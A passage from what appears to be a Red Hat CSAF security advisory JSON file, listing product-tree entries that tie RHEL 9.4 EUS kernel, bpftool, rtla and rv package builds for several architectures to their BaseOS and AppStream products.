"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.src",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
